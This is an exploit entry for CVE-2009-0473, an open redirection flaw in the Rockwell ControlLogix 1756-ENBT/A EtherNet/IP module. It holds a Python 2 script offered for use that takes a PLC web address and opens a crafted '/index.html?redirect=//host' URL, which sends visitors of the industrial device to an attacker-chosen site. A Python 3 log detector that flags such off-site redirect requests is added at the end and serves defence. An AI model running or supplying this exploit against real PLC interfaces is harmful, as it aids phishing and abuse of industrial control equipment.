# CVE-2009-0473 Rockwell Automation ControlLogix 1756-ENBT/A EtherNet/IP Bridge Module Redirection Vulnerability
==INFO==
## Description
Simple script to exploit the open redirection vulnerability in Rockwell ControlLogix 1756-ENBT/A.

## Vulnerability Details
https://www.cvedetails.com/cve/CVE-2009-0473/

### Requirements
* Python 2.7
* You must be running an X Windows environment before executing this script.
* It will use Python's "webbrowser" library to open the site using the default browser.
==EXP==
```python
# Author : Akbar Qureshi
import webbrowser
import urllib2


class colors:
    # ANSI escape codes used to highlight the banner
    alert = '\033[93m'
    end = '\033[0m'


print colors.alert + """
############################################################################
# Description: This script will exploit the open redirection vulnerability #
# in Rockwell ControlLogix 1756-ENBT/A                                     #
# CVE Details: https://www.cvedetails.com/cve/CVE-2009-0473/               #
############################################################################
""" + colors.end

plcurl = raw_input("Enter the plc web interface url: ")

try:
    # Check that the PLC web interface answers before going further
    url = urllib2.urlopen('http://%s' % plcurl, timeout=5)
except Exception:
    print "Cannot open url, please try again"
else:
    open_redir = raw_input("Enter open redirection URL: ")
    # Build the request with the redirect parameter and open it in the default browser
    url = "http://%s/index.html?redirect=//%s" % (plcurl, open_redir)
    webbrowser.open(url, new=1)
```
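On the defensive side, the request this script builds (`/index.html?redirect=//host`) leaves a recognisable trace in web logs. The following is an added example, not part of the original script, written in Python 3; it assumes a reverse proxy in front of the module that writes Common Log Format, and the function names and sample log lines are constructed for illustration.

```python
# Added example (Python 3): flag log entries whose `redirect` parameter
# points off the module, as in the URL built by the script above.
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: Common Log Format; only client address and request line are used.
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')


def redirect_target(value):
    """Return the host an off-site `redirect` value points to, else None."""
    value = value.strip()
    if value.startswith("//") or re.match(r"^[a-zA-Z][a-zA-Z0-9+.-]*://", value):
        return urlsplit(value).hostname
    return None  # relative path: the browser stays on the module


def find_offsite_redirects(log_lines, allowed_hosts=()):
    """Return a list of (client, host) for redirects leaving allowed_hosts."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qs percent-decodes, so %2F%2Fhost is treated like //host
        for value in parse_qs(query).get("redirect", []):
            host = redirect_target(value)
            if host and host not in allowed_hosts:
                hits.append((m.group("client"), host))
    return hits


# Constructed sample lines (documentation addresses and domains, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /index.html?redirect=//example.org HTTP/1.1" 302 0',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /index.html?redirect=%2F%2Fexample.net%2Fa HTTP/1.1" 302 0',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /index.html?redirect=/home.asp HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for client, host in find_offsite_redirects(SAMPLE_LOG):
        print(client, "->", host)
```

Pass the module's own address or hostname in `allowed_hosts` so that legitimate same-host redirects are not reported.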